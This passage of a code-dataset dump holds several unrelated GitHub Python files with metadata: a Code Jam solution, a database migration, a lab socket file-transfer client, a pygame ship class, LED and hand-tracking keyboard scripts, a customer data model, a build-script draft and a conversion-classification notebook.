int(''.join(cpA)) * int(''.join(cpA)) <= intA:\r\n isEqual = intA==int(''.join(cpA)) * int(''.join(cpA))\r\n result += 1\r\n else:\r\n return (result, isEqual)\r\n j+=1\r\n \r\n cpA = ['0' for i in range(a)]\r\n cpA[0] = '2'\r\n cpA[-1] = '2'\r\n \r\n if a % 2 == 1:\r\n cpA[int(a/2)] = '1'\r\n if int(''.join(cpA)) * int(''.join(cpA)) <= intA:\r\n isEqual = intA==int(''.join(cpA)) * int(''.join(cpA))\r\n return (result + 2, isEqual)\r\n else:\r\n cpA[int(a/2)] = '0'\r\n if int(''.join(cpA)) * int(''.join(cpA)) <= intA:\r\n isEqual = intA==int(''.join(cpA)) * int(''.join(cpA))\r\n return (result + 1, isEqual)\r\n else:\r\n return (result,isEqual)\r\n else:\r\n if int(''.join(cpA)) * int(''.join(cpA)) <= intA:\r\n isEqual = intA==int(''.join(cpA)) * int(''.join(cpA))\r\n return (result + 1, isEqual)\r\n else:\r\n return (result,isEqual)\r\n \r\n return (result,isEqual)\r\n\r\n\r\ndef test(a, b):\r\n lenA = (len(str(a)) + 1) / 2\r\n lenB = (len(str(b)) + 1) / 2 \r\n \r\n## lastLenA = len(str(a)) /2\r\n## lastLenB = len(str(b)) /2\r\n numA,equalA = calc(lenA, lenA-1, a)\r\n numB,equalB = calc(lenB, lenB-1, b)\r\n\r\n if equalA:\r\n return numB - numA + 1\r\n else:\r\n return numB - numA \r\n\r\nwhile i < len(inputs):\r\n a, b=inputs[i].replace('\\r','').replace('\\n','').strip().split()\r\n a = int(a)\r\n b = int(b)\r\n \r\n i+=1\r\n result += 'Case #%d: ' %count + str(test(a,b)) + '\\r\\n'\r\n count += 1\r\n\r\nf=open(outputFile,'wb')\r\nf.write(result)\r\nf.close()\r\n \r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_118/1849.py","file_name":"1849.py","file_ext":"py","file_size_in_byte":3694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12421189633","text":"\"\"\"empty message\n\nRevision ID: a6ab2a579b5e\nRevises: fd781ba359c8\nCreate Date: 2022-07-15 01:53:43.771252\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'a6ab2a579b5e'\ndown_revision = 'fd781ba359c8'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('projects',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('stocks_id', sa.Integer(), nullable=True),\n sa.Column('services_required', sa.String(length=50), nullable=True),\n sa.Column('customer_company', sa.String(length=50), nullable=True),\n sa.Column('customer_poc_name', sa.String(length=50), nullable=True),\n sa.Column('timestamp', sa.DateTime(), nullable=True),\n sa.ForeignKeyConstraint(['stocks_id'], ['stock_list.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_projects_timestamp'), 'projects', ['timestamp'], unique=False)\n op.add_column('stock_list', sa.Column('quantity', sa.Integer(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.drop_column('stock_list', 'quantity')\n op.drop_index(op.f('ix_projects_timestamp'), table_name='projects')\n op.drop_table('projects')\n # ### end Alembic commands ###\n","repo_name":"healthier-vitamins/workflow-management-backend","sub_path":"migrations/versions/a6ab2a579b5e_.py","file_name":"a6ab2a579b5e_.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41371647518","text":"import socket\nimport os\nimport time\n\n#create socket\ns = socket.socket()\n\n\nport = 8880\n\n#connect to server\ns.connect(('192.168.114.6',port))\n\n#File to be sent\nfile_name = input(\"[+]File name:\")\nfile_size = os.path.getsize(file_name)\n\n#Send file to server\ns.send(file_name.encode())\ns.send(str(file_size).encode())\n\n# Open and read file\nwith open(file_name,\"rb\") as file:\n\n\tc = 0\n\n\t#Start time record\n\tstart_time = time.time()\n\n\t#loop for sent the file\n\twhile c <= file_size:\n\t\tdata1 = file.read(1024)\n\t\tif not (data1):\n\t\t\tbreak\n\t\ts.sendall(data1)\n\t\tc = c + len(data1)\n\n\t#end time record\n\tend_time = time.time()\n\n\nprint(\"[+] File transfer to server complete! Total time: \",end_time - start_time)\n\n#close socket\ns.close() \n\ns.close()\n","repo_name":"skyclimberxx/ITT440-LAB5","sub_path":"Client5.4.py","file_name":"Client5.4.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31968938056","text":"import pygame\n\n\nclass Ship:\n \"\"\"Class to manage space ship\"\"\"\n\n def __init__(self, ai_game):\n \"\"\"init space ship and start location\"\"\"\n self.screen = ai_game.screen\n self.settings = ai_game.settings\n self.screen_rect = ai_game.screen.get_rect()\n\n # Load ship image\n self.image = pygame.image.load('ship.bmp')\n self.rect = self.image.get_rect()\n\n # New ship start at the bottom of screen\n self.rect.midbottom = self.screen_rect.midbottom\n\n # Ship location\n self.x = float(self.rect.x)\n\n # Check if ship is moving\n self.moving_right = False\n self.moving_left = False\n\n def update(self):\n \"\"\"Update ship location based on move\"\"\"\n if self.moving_right and self.rect.right < self.screen_rect.right:\n self.x += self.settings.ship_speed\n if self.moving_left and self.rect.left > 0:\n self.x -= self.settings.ship_speed\n\n # Update ship location x\n self.rect.x = self.x\n\n def blitme(self):\n \"\"\"Display ship in actual position\"\"\"\n self.screen.blit(self.image, self.rect)\n\n def center_ship(self):\n \"\"\"move ship to mid bottom scren\"\"\"\n self.rect.midbottom = self.screen_rect.midbottom\n self.x = float(self.rect.x)\n","repo_name":"filipAnt/alien_invasion","sub_path":"ship.py","file_name":"ship.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41173273400","text":"#Challenge: Given an array arr of N integers. Find the contiguous sub-array \n# with maximum sum.\n\n#Idea: A contiguous subarray is the maximum if:\n# (1) Sum is positive and no smaller contiguous subarrays in the sum's \n# subarray have a negative sum OR\n# (2) Sum is negative and no contiguous subarrays have sum is positve\n# Count the sum from left to right. 
If sum becomes negative, restart count.\n\ndef subarrayWithMaxSum(numbers):\n max_sum = None\n count = 0\n for number in numbers:\n count += number\n if max_sum is None or max_sum < count:\n max_sum = count\n if count < 0:\n count = 0\n return max_sum\n\nif __name__ == '__main__':\n assert subarrayWithMaxSum([1,2,3,-2,5]) == 9\n assert subarrayWithMaxSum([-1,-2,-3,-4]) == -1\n","repo_name":"edenuis/Python","sub_path":"Code Challenges/subarrayWithMaxSum.py","file_name":"subarrayWithMaxSum.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23876258673","text":"from machine import ADC, Pin\nimport time\n\npotentiometer = ADC(Pin(27))\n\nred = Pin(18, Pin.OUT)\namber = Pin(19, Pin.OUT)\ngreen = Pin(20, Pin.OUT)\nall_leds = [red, amber, green]\n\n\ndef set_all(leds_to_set, to_set, delay=None, reverse_order=False):\n if reverse_order:\n leds_to_set = reversed(leds_to_set)\n\n for led in leds_to_set:\n led.value(to_set)\n if delay:\n time.sleep(delay)\n\n\ndef blink(leds_to_blink, blink_duration=0.5, delay=None, alternate=False):\n set_all(leds_to_blink, 1, delay=delay)\n time.sleep(blink_duration)\n\n set_all(leds_to_blink, 0, delay=delay, reverse_order=alternate)\n time.sleep(blink_duration)\n\n\nknob_percentage = 0\nwhile True:\n knob_percentage = potentiometer.read_u16() / 65000\n if knob_percentage < 0.1:\n set_all(all_leds, 0)\n elif knob_percentage < 0.34:\n set_all([red], 1)\n set_all([amber, green], 0)\n elif knob_percentage < 0.67:\n set_all([red, amber], 1)\n set_all([green], 0)\n elif knob_percentage < 0.99:\n set_all(all_leds, 1)\n else:\n blink(all_leds)\n","repo_name":"WalternativE/maker_advent_calendar","sub_path":"twelve_days_of_pi/day_04_gauge.py","file_name":"day_04_gauge.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3348220448","text":"from time import strptime, mktime\n\nfrom datetime import datetime\n\nfrom kwod_webapp.database.models import ECGRecording\n\n\nclass HeaderParser(object):\n def __init__(self):\n pass\n\n def parse_header(self, header_url):\n with open(header_url, 'r') as f:\n first_line = f.readline()\n tokens = first_line.split()\n\n plot_count = int(tokens[1])\n\n comment_lines = []\n\n while True:\n line = f.readline()\n if not line:\n break\n elif line.startswith(\"#\"):\n comment_lines.append(line[1:])\n\n return ECGRecording(\n name=tokens[0],\n timestamp=None,\n url=header_url.replace(\".hea\", \".dat\"),\n plot_count=plot_count,\n frequency=int(tokens[2]),\n sample_count=int(tokens[3]),\n comment='\\n'.join(comment_lines)\n )\n","repo_name":"karaleina/kwod","sub_path":"kwod_webapp/parsers/header_parser.py","file_name":"header_parser.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"19227879489","text":"import os\nimport uuid\nfrom classes.Customer import Customer\nfrom classes.ParentModel import ParentModel\nfrom utils.consts import ROOT_PATH, CUSTOMERS_FILE\n\n\nclass CustomerModel(ParentModel):\n customers = []\n\n def load_customers(self):\n file = self.__open_file(\"r\")\n self.customers = []\n if (file):\n for customer in file:\n customer = customer.rstrip(\"\\n\").split(\",\")\n customer_to_save = Customer(\n customer[0], customer[1], customer[2], customer[3], customer[4])\n self.__save_customer_to_list(customer_to_save)\n 
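# --- Editor's aside (hedged): the split(",")-based loader above assumes that
# no customer field ever contains a comma. A minimal sketch of a safer reader
# built on the stdlib csv module is shown below; the file name and the
# five-field layout (id, name, address, phone, nit) are taken from this class
# and are assumptions, not an existing project API.
import csv

def read_customer_rows(path: str) -> list:
    """Return one list of fields per customer line, honoring quoted commas."""
    rows = []
    with open(path, newline="", encoding="utf-8") as fh:
        for row in csv.reader(fh):
            if len(row) == 5:  # id, name, address, phone, nit
                rows.append(row)
    return rows

# Usage sketch: rows = read_customer_rows("customers.txt")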
file.close()\n\n def get_customers(self):\n return self.customers\n\n def save(self, customer: Customer) -> bool:\n file = self.__open_file(\"a\")\n customer.id = uuid.uuid4()\n if (file):\n file.write(\n f\"{customer.id},{customer.name},{customer.address},{customer.phone},{customer.nit}\\n\")\n file.close()\n self.__save_customer_to_list(customer)\n return True\n\n return False\n\n def update(self, customer: Customer) -> bool:\n is_updated = self.__update_in_file(customer)\n if (is_updated):\n index = self.get_element_index(customer, self.customers)\n if (index != None):\n self.customers[index].name = customer.name\n self.customers[index].address = customer.address\n self.customers[index].phone = customer.phone\n self.customers[index].nit = customer.nit\n return is_updated\n\n def delete(self, customer: Customer):\n print(\"id\", customer.id)\n is_deleted = self.__delete_in_file(customer)\n if (is_deleted):\n self.customers.remove(customer)\n\n return is_deleted\n\n def __save_customer_to_list(self, customer: Customer):\n self.customers.append(customer)\n\n def __open_file(self, open_mode: str):\n try:\n file = open(os.path.abspath(\n f\"{ROOT_PATH}\\{CUSTOMERS_FILE}\"), mode=open_mode, encoding=\"utf-8\")\n return file\n except FileNotFoundError:\n print(f\"Sorry, the file {CUSTOMERS_FILE} does not exist.\")\n return None\n\n def __delete_in_file(self, customer: Customer):\n read_file = self.__open_file(\"r\")\n if read_file:\n lines = read_file.readlines()\n read_file.close()\n updated_lines = [\n line for line in lines if not line.startswith(str(customer.id))]\n write_file = self.__open_file(\"w\")\n write_file.writelines(updated_lines)\n write_file.close()\n return True\n return False\n\n def __update_in_file(self, customer: Customer):\n read_file = self.__open_file(\"r\")\n if read_file:\n lines = read_file.readlines()\n read_file.close()\n index = self.get_element_index_in_file(customer, lines)\n lines[index] = f\"{customer.id},{customer.name},{customer.address},{customer.phone},{customer.nit}\\n\"\n write_file = self.__open_file(\"w\")\n write_file.writelines(lines)\n write_file.close()\n return True\n return False\n","repo_name":"OzkrMonroy/py_store_manager","sub_path":"models/CustomerModel.py","file_name":"CustomerModel.py","file_ext":"py","file_size_in_byte":3250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34900354740","text":"test_inputs = [\n \"inputs/day23\"\n]\n\n\nclass Node:\n def __init__(self, value, nxt=None):\n self.v = value\n self.n = nxt\n\n\ndef step(cups):\n index_map = {}\n for idx, val in enumerate(cups):\n index_map[val] = idx\n\n current = cups[0]\n to_move = cups[1:4]\n destination = current - 1\n if destination == 0:\n destination = len(cups)\n while destination in to_move:\n destination = (destination - 1)\n if destination == 0:\n destination = len(cups)\n\n destination_idx = index_map[destination]\n next_cups = []\n for idx in range(4, len(cups)):\n next_cups.append(cups[idx])\n if idx == destination_idx:\n next_cups += to_move\n next_cups.append(current)\n return next_cups\n\n\ndef step2(node_map, cur, size):\n cur_node = node_map[cur]\n first_to_move = cur_node.n\n last_to_move = cur_node.n.n.n\n move_values = {cur_node.n.v, cur_node.n.n.v, cur_node.n.n.n.v}\n dest = cur_node.v\n while True:\n dest = dest - 1\n if dest == 0:\n dest = size\n if dest not in move_values:\n break\n dest_node = node_map[dest]\n\n cur_node.n = last_to_move.n\n tmp = dest_node.n\n dest_node.n = first_to_move\n 
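    # (descriptive note on the splice above/below) the three picked-up cups now
    # hang off dest_node via first_to_move, while tmp still holds dest_node's
    # old successor; the next assignment re-attaches tmp after last_to_move,
    # closing the ring again with O(1) pointer updates and no list indexing.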
last_to_move.n = tmp\n return cur_node.n.v\n\n\ndef process(path):\n print(\"Input:\", path)\n\n with open(path) as f:\n for line in f:\n cups = [int(c) for c in line.strip()]\n node_map = {}\n prev = None\n for cup in cups + list(range(len(cups) + 1, 10 ** 6 + 1)):\n node_map[cup] = Node(cup)\n if prev:\n prev.n = node_map[cup]\n prev = node_map[cup]\n prev.n = node_map[cups[0]]\n\n cur = cups[0]\n for x in range(10 ** 7):\n cur = step2(node_map, cur, 10 ** 6)\n\n one_node = node_map[1]\n print(one_node.n.v * one_node.n.n.v)\n\n\ndef main():\n for path in test_inputs:\n process(path)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"will-snavely/adventofcode","sub_path":"aoc2020/day23.py","file_name":"day23.py","file_ext":"py","file_size_in_byte":2052,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"40608868358","text":"#-*-coding: utf-8-*-\n#!/bin/sh\n\n'''\n# @file\t\tthe easymake-yaml script written by python3\n# @date \t2020-06\n# @author\tStephen-Zhang(github.com/stark-zhang)\n# @lic\t\tMIT and all right reserved\n'''\n\nimport yaml as yml\nfrom pathlib import Path as path\nfrom getopt import gnu_getopt\nimport sys, os, re\n\n'''\n# @brief\tsome variables\n'''\noptions = [\n\t\t'f:o:cb:e:nh?v',\n\t\t['file=', 'output=', 'check-complier', 'build=', 'exec=', 'just-print', 'help', 'version'],\n]\n\nversion = '0.0.1-alpha'\n\n'''\n# @brief\tExceptions while processing easymake configuration\n'''\nclass EasyMakeBaseException(Exception):\n\t'''\n\tThe basic exception class for easymake-yaml\n\t'''\n\tdef __init__(self, excep_no: int, details: str):\n\t\tself.details = details\n\t\tself.excep_no = excep_no\n\n\tdef format(self, excep_name: str) -> str:\n\t\treturn excep_name + ': '+ str(self.excep_no) + ', ' + self.details\n\nclass TemporaryDirException(EasyMakeBaseException):\n\t# the error about temporary folder\n\tdef __repr__(self):\n\t\treturn self.format('TemporaryDirException')\n\nclass DefaultConfigNotExistException(EasyMakeBaseException):\n\t'''\n\twill be raised when cannot find default configuration files\n\t'''\n\tdef __repr__(self):\n\t\treturn self.format('DefaultConfigNotExistException')\n\nclass CommandStringIllegalException(EasyMakeBaseException):\n\t'''\n\twill be raised when compiler deduced failed\n\t'''\n\tdef __repr__(self):\n\t\treturn self.format('CommandStringIllegalException')\n\nclass default_complier:\n\t'''\n\tA class to store information of property \"compiler\"\n\t'''\n\tclass command:\n\t\t'''\n\t\tA sub-class to store sub-property 'command'\n\t\t'''\n\t\tdef __init__(self):\n\t\t\t'''\n\t\t\tdefault value from GNU Compiler Collections(gcc.gnu.org)\n\t\t\t'''\n\t\t\tself.cc = 'gcc'\n\t\t\tself.cxx = 'g++'\n\t\t\tself.ar = 'ar'\n\n\t\tdef cc_praser(self, property: str, value: str):\n\t\t\t'''\n\t\t\tuse one of sub-property(cc, cxx, ar) to deduce others command, via regex\n\t\t\tdo not deduce other commands from ar\n\t\t\t'''\n\t\t\t# the real filename of command may be started with '/' and must be ended without '/'.\n\t\t\t# so we can use this rule to find where the real command is and deduce other commands\n\n\t\t\t# deduce from property 'cc'\n\t\t\tif property == 'cc':\n\t\t\t\tself.cc = value\n\t\t\t\tif 'gcc' in self.cc:\n\t\t\t\t\tpattern = self._cc_re_compile('gcc')\n\t\t\t\t\tmatches = re.search(pattern, self.cc)\n\t\t\t\t\tif matches is not None:\n\t\t\t\t\t\t# get the correct sub-string which may be start with '/'\n\t\t\t\t\t\tcc_to_match = matches.group(0).replace('gcc', 
'g++')\n\t\t\t\t\t\tar_to_match = matches.group(0).replace('gcc', 'ar')\n\n\t\t\t\t\t\t# replace them, and as same as following processes\n\t\t\t\t\t\tself.cxx = re.sub(pattern, cc_to_match, self.cc)\n\t\t\t\t\t\tself.ar = re.sub(pattern, ar_to_match, self.cc)\n\n\t\t\t\tif 'clang' in self.cc:\n\t\t\t\t\tpattern = self._cc_re_compile('clang')\n\t\t\t\t\tmatches = re.search(pattern, self.cc)\n\t\t\t\t\tif matches is not None:\n\t\t\t\t\t\tcc_to_match = matches.group(0).replace('clang', 'clang++')\n\t\t\t\t\t\tar_to_match = matches.group(0).replace('clang', 'llvm-ar')\n\t\t\t\t\t\tself.cxx = re.sub(pattern, cc_to_match, self.cc)\n\t\t\t\t\t\tself.ar = re.sub(pattern, ar_to_match, self.cc)\n\n\t\t\t\tif matches is None:\n\t\t\t\t\traise CommandStringIllegalException(11, \"Cannot find value of property \\'%s\\'\" % property)\n\t\t\t\t\n\t\t\t# deduce from property 'cxx'\n\t\t\tif property == 'cxx':\n\t\t\t\tself.cxx = value\n\t\t\t\tmatches = None\n\t\t\t\tif 'g++' in self.cxx:\n\t\t\t\t\tpattern = self._cc_re_compile('g++')\n\t\t\t\t\tmatches = re.search(pattern, self.cxx)\n\t\t\t\t\tif matches is not None:\n\t\t\t\t\t\tcc_to_match = matches.group(0).replace('g++', 'gcc')\n\t\t\t\t\t\tar_to_match = matches.group(0).replace('g++', 'ar')\n\t\t\t\t\t\tself.cc = re.sub(pattern, cc_to_match, self.cxx)\n\t\t\t\t\t\tself.ar = re.sub(pattern, ar_to_match, self.cxx)\n\n\t\t\t\tif 'clang++' in self.cxx:\n\t\t\t\t\tpattern = self._cc_re_compile('clang++')\n\t\t\t\t\tmatches = re.search(pattern, self.cxx)\n\t\t\t\t\tif matches is not None:\n\t\t\t\t\t\tcc_to_match = matches.group(0).replace('clang++', 'clang')\n\t\t\t\t\t\tar_to_match = matches.group(0).replace('clang++', 'llvm-ar')\n\t\t\t\t\t\tself.cc = re.sub(pattern, cc_to_match, self.cxx)\n\t\t\t\t\t\tself.ar = re.sub(pattern, ar_to_match, self.cxx)\n\n\t\t\t\tif matches is None:\n\t\t\t\t\traise CommandStringIllegalException(11, \"Cannot find value of property \\'%s\\'\" % property)\n\n\t\tdef _cc_re_compile(self, command_to_match: str) -> str:\n\t\t\t'''\n\t\t\ta private function to get a regex string\n\t\t\t'''\n\t\t\treturn r'\\/?' 
+ command_to_match + r'((?!\\/).)*$'\n\n\tdef __init__(self):\n\t\tself.command = self.command()\t\t\t# sub-property: command\n\t\tself.flags = None\t\t\t\t\t\t# sub-property: flags(for C/C++ Compiler)\n\t\tself.cflags = None\t\t\t\t\t\t# sub-property: flags for c compiler\n\t\tself.ccflags = None\t\t\t\t\t\t# sub-property: flags for c++ compiler\n\t\tself.arflags = None\t\t\t\t\t\t# sub-property: flags archive tool\n\t\tself.ldflags = None\t\t\t\t\t\t# sub-property: flags ld\n\t\tself.libpath = None\t\t\t\t\t\t# sub-property: the path to search libraries(-L)\n\t\tself.hpath = None\t\t\t\t\t\t# sub-property: the path to search headers(-i)\n\t\tself.links = None\t\t\t\t\t\t# property in global: the libraries will be linked(-l)\n\t\tself.headers = None\t\t\t\t\t\t# property in global: the headers will be included(-I)\n\n\nclass extra_compiler:\n\t'''\n\tA class to store information of property \"extraCompiler\"\n\t'''\n\tdef __init__(self):\n\t\tpass\n\nclass custom_target:\n\t'''\n\tA class to store information of property \"customTarget\"\n\t'''\n\t# TODO: this class will be defined in the future\n\tpass\n\nclass Makefile:\n\t'''\n\tto receive infomation of yaml praser, and generate Makefile\n\t'''\n\tdef __init__(self):\n\t\tpass\n\n'''\n# @brief\tsome functions\n'''\ndef find_default_configuration() -> str:\n\t'''\t\n\tsearch the default configuration file named or \n\t'''\n\tdefault_config = path('./easymake.yml')\n\n\tif default_config.exists() and default_config.is_file():\n\t\treturn str(default_config)\n\n\tdefault_config = path('./emake.yml')\n\n\tif default_config.exists() and default_config.is_file():\n\t\treturn str(default_config)\n\n\traise DefaultConfigNotExistException(0, \"Error: Cannot find the default configuration\")\n\ndef check_command_exists(os_name: str, command: str) -> bool:\n\t'''\n\tcheck spcified command exists or not in the PATH\n\t'''\n\tif '/' in command or '\\\\' in command:\n\t\t# if '/' or '\\' is in command, it may be in absolute path\n\t\treturn path(command).exists()\n\n\telse:\n\t\t# in MS Windows, the spliter of PATH is ';', in Unix-like, it's ':'\n\t\tpath_spliter = ';' if os_name == 'nt' else ':'\n\n\t\t# and, `.exe` is neccessery suffix of complete command in MS Windows\n\t\tcommand += '.exe' if os_name == 'nt' else ''\n\n\t\t# search command in the PATH\n\t\tfor p in os.environ['PATH'].split(path_spliter):\n\t\t\tif (path(p) / command).exists():\n\t\t\t\treturn True\n\ndef copy_root_structure(output_dir: str):\n\t'''\n\tcopy structure of project root to output directory(the value of property 'int')\n\t'''\n\tpass\n\ndef usage():\n\tprint(\"Usage: %s [OPTIONS]...\" % sys.argv[0])\n\n# Execute this script in shell\nif __name__ == '__main__':\n\ttry:\n\t\t# prase the CLI Options\n\t\topts, args = gnu_getopt(sys.argv[1:], options[0], options[1])\n\n\texcept EasyMakeBaseException as e:\n\t\tprint(repr(e))\n\t\n\texcept Exception as e:\n\t\tprint(repr(e))\n\n# EOF\n","repo_name":"zhang-stephen/easymake-yaml","sub_path":"emake.py","file_name":"emake.py","file_ext":"py","file_size_in_byte":6965,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"13422057874","text":"from time import sleep\nimport numpy as np\nfrom cvzone.HandTrackingModule import HandDetector\nimport cv2\nimport cvzone\nfrom pynput.keyboard import Controller\n\nkeys = [[\"Q\", \"W\", \"E\", \"R\", \"T\", \"Y\", \"U\", \"I\", \"O\", \"P\"],\n [\"A\", \"S\", \"D\", \"F\", \"G\", \"H\", \"J\", \"K\", \"L\", \";\"],\n [\"Z\", \"X\", 
\"C\", \"V\", \"B\", \"N\", \"M\", \",\", \".\", \"/\"]]\nfinalText = \"\"\n\nkeyboard = Controller()\n\n\n# def drawAll(img, buttonList):\n# for button in buttonList:\n# x, y = button.pos\n# w, h = button.size\n# cvzone.cornerRect(img, (button.pos[0], button.pos[1], button.size[0], button.size[1]),\n# 20, rt=0)\n# cv2.rectangle(img, button.pos, (x + w, y + h), (255, 0, 255), cv2.FILLED)\n# cv2.putText(img, button.text, (x + 20, y + 65),\n# cv2.FONT_HERSHEY_PLAIN, 4, (255, 255, 255), 4)\n# return img\ndef drawAll(img, buttonList):\n imgNew = np.zeros_like(img, np.uint8)\n for button in buttonList:\n x, y = button.pos\n cvzone.cornerRect(imgNew, (button.pos[0], button.pos[1], button.size[0], button.size[1]),\n 20, rt=0)\n cv2.rectangle(imgNew, button.pos, (x + button.size[0], y + button.size[1]),\n (255, 0, 255), cv2.FILLED)\n cv2.putText(imgNew, button.text, (x + 40, y + 60),\n cv2.FONT_HERSHEY_PLAIN, 2, (255, 255, 255), 3)\n\n out = img.copy()\n alpha = 0.5\n mask = imgNew.astype(bool)\n print(mask.shape)\n out[mask] = cv2.addWeighted(img, alpha, imgNew, 1 - alpha, 0)[mask]\n return out\n\n\nclass Button:\n def __init__(self, pos, text, size=[85, 85]):\n self.pos = pos\n self.size = size\n self.text = text\n\n\nbuttonList = []\nfor i in range(len(keys)):\n for j, key in enumerate(keys[i]):\n buttonList.append(Button([100 * j + 50, 100 * i + 50], key))\n\ncap = cv2.VideoCapture(0)\ncap.set(3, 1280)\ncap.set(4, 720)\ndetector = HandDetector(detectionCon=0.8, maxHands=1)\nwhile True:\n # Get image frame\n success, img = cap.read()\n # Find the hand and its landmarks\n hands, img = detector.findHands(img) # with draw\n # hands = detector.findHands(img, draw=False) # without draw\n\n if hands:\n # Hand 1\n hand1 = hands[0]\n lmList1 = hand1[\"lmList\"] # List of 21 Landmark points\n bbox1 = hand1[\"bbox\"] # Bounding box info x,y,w,h\n centerPoint1 = hand1['center'] # center of the hand cx,cy\n handType1 = hand1[\"type\"] # Handtype Left or Right\n\n fingers1 = detector.fingersUp(hand1)\n if lmList1:\n for button in buttonList:\n x, y = button.pos\n w, h = button.size\n if x < lmList1[8][0] < x + w and y < lmList1[8][1] < y + h:\n cv2.rectangle(img, (x - 5, y - 5), (x + w + 5, y + h + 5), (175, 0, 175), cv2.FILLED)\n cv2.putText(img, button.text, (x + 20, y + 65),\n cv2.FONT_HERSHEY_PLAIN, 4, (255, 255, 255), 4)\n l, _ = detector.findDistance(lmList1[8], lmList1[12])\n\n if l < 30:\n keyboard.press(button.text)\n cv2.rectangle(img, button.pos, (x + w, y + h), (0, 255, 0), cv2.FILLED)\n cv2.putText(img, button.text, (x + 20, y + 65),\n cv2.FONT_HERSHEY_PLAIN, 4, (255, 255, 255), 4)\n finalText += button.text\n sleep(0.3)\n\n # Display\n cv2.rectangle(img, (50, 350), (700, 450), (175, 0, 175), cv2.FILLED)\n cv2.putText(img, finalText, (60, 430),cv2.FONT_HERSHEY_PLAIN, 5, (255, 255, 255), 5)\n img = drawAll(img, buttonList)\n cv2.imshow(\"Image\", img)\n cv2.waitKey(1)\n","repo_name":"ThusharaSampath/virtual_keypad","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3753,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"73762029314","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import train_test_split # splitting the data\nfrom sklearn import metrics\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.tree import DecisionTreeClassifier as dtc # tree algorithm\nfrom sklearn.tree import plot_tree # tree 
diagram\n\ndf=pd.read_csv('data.csv')\n\ndf.head()\n\ndf.count()/len(df)\n\nlen(df[df['converted']==1]) #64076\n\nlen(df) # 919084\n\ndf.columns\n\nX=df[['treatment_name', 'gv_band_a', 'gv_band_b', 'gv_band_c', 'gv_band_d',\n 'weekday', 'was_price_flag', 'discount_band_0_10',\n 'discount_band_10_19', 'discount_band_19_29', 'price_band_0_26',\n 'price_band_26_68', 'price_band_68_149', 'price_band_149_343']]\ny=df['converted']\n\n############ split into training and testing\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=1) # 70% training and 30% test\n\n############ Logistic Regression\n\nimport imblearn\nfrom imblearn.pipeline import Pipeline\nfrom imblearn.under_sampling import RandomUnderSampler\nfrom collections import Counter\n\n# define undersample strategy\nundersample = RandomUnderSampler(sampling_strategy=0.5)\n\n# fit and apply the transform\nX_over, y_over = undersample.fit_resample(X_train, y_train)\n\n# summarize class distribution\nprint(Counter(y_over))\n\nlr = LogisticRegression()\nlr.fit(X_over, y_over)\n\n# Predicting on the test data\ny_pred_log = lr.predict(X_test)\n\n#Calculating and printing the f1 score\nf1_test_log = metrics.f1_score(y_test, y_pred_log)\nprint('The f1 score for the testing data:', f1_test_log)\n\n# Print the confusion matrix\ny_pred_train = lr.predict(X_over)\nprint(metrics.classification_report(y_over, y_pred_train, digits=3))\nprint(metrics.confusion_matrix(y_over, y_pred_train))\n\nprint(metrics.confusion_matrix(y_test, y_pred_log))\n\nprint(metrics.classification_report(y_test, y_pred_log, digits=3))\n\n############# Decision Tree\n\n# Create Decision Tree classifier object\nclf = dtc(criterion=\"entropy\", max_depth=5, min_weight_fraction_leaf=0.1, ccp_alpha=0.001)\n\n# Train Decision Tree Classifier\nclf = clf.fit(X_over,y_over)\n\n#Predict the response for test dataset\ny_pred_dt = clf.predict(X_test)\n\nprint('The f1 score for the testing data:', metrics.f1_score(y_test, y_pred_dt))\n\n# Print the confusion matrix\ny_pred_train_clf = clf.predict(X_over)\nprint(metrics.classification_report(y_over, y_pred_train_clf, digits=3))\nprint(metrics.confusion_matrix(y_over, y_pred_train_clf))\n\nprint(metrics.confusion_matrix(y_test, y_pred_dt))\n\nprint(metrics.classification_report(y_test, y_pred_dt, digits=3))\n\n############## Random Forest\nfrom sklearn.ensemble import RandomForestClassifier\nrf = RandomForestClassifier(max_depth=4, random_state=0)\nrf.fit(X_over, y_over)\n\n#Predict the response for test dataset\ny_pred_rf = rf.predict(X_test)\n\nprint('The f1 score for the testing data:', metrics.f1_score(y_test, y_pred_rf))\n\n# Print the confusion matrix\ny_pred_train_rf = rf.predict(X_over)\nprint(metrics.classification_report(y_over, y_pred_train_rf, digits=3))\nprint(metrics.confusion_matrix(y_over, 